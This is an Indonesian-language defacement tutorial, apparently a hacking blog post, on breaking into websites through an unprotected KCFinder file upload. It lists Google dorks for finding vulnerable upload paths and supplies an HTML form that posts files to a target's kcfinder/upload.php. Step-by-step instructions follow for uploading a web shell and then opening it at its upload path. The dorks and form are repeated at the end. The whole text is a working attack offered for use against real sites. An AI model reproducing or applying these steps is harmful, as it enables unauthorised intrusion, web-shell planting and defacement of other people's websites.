GW BALIK LAGI NEH, Mastah minggir :v
KALI INI GW BAKALAN AJARIN DEFACE LAGI DENGAN METODE
KCFINDER :)OK BAHAN YANG DI PERLUKAN :
-PC/ANDROID
-KONEKSI INTERNET DAN BROWSER
-DORK :
*inurl:/asset/kcfinder
*sites/all/modules/civicrm/packages/kcfinder
*inurl:templates/_editor/kcfinder/
*inurl:includes/kcfinder/browse.php
*inurl:/kcfinder/browse.php
*lib/kcfinder/files/upload
*admin/kcfinder/files/upload
*panel/kcfinder/upload/files
*editor/kcfinder/upload
*Kcfinder/upload/files
*inurl:/panel/kcfinder/ ext:png
-CSRF
<form method="POST" action="http://target.nya/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ nnd</button>
</form>
OK IKUTI LANGKAH SAYA YAA :)
1.DORKING DI GOOGLE.
2.PILIH TARGET LALU BUKA LINK TARGET.
3.TAMBAHKAN upload.php DI BELAKANG kcfinder/.
4.JIKA VULN MAKA AKAN MUNCUL
Unknown Error
5.MASUKAN LINKNYA KE CSRF.
6. BUKA CSRFNYA.
7.KLIK CHOOSE FILE.
8.PILIH SHELL YANG SUDAH KALIAN DOWNLOAD TADI.
9.KLIK UPLOAD.
10.JIKA BERHASIL DI UPLOAD MAKA AKAN MUNCUL PESAN KOSONG.
CARA MENGAKSES FILE SHELLNYA ADALAH :
kcfinder/upload/files/wqe.php5 [wqe.php5 ADALAH NAMA SHELL SAYA]
TADAAAA SAYA TELAH BERHASIL MENGUPLOAD SHELL :D
SAYA RASA SEKIAN TUTORIAL KALI INI :D SAMPAI JUMPA DI TUTORIAL BERIKUTNYA YA BRO :D
*inurl:/asset/kcfinder
*sites/all/modules/civicrm/packages/kcfinder
*inurl:templates/_editor/kcfinder/
*inurl:includes/kcfinder/browse.php
*inurl:/kcfinder/browse.php
*lib/kcfinder/files/upload
*admin/kcfinder/files/upload
*panel/kcfinder/upload/files
*editor/kcfinder/upload
*Kcfinder/upload/files
*inurl:/panel/kcfinder/ ext:png
-CSRF<form method="POST" action="http://target.nya/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ nnd</button>
</form>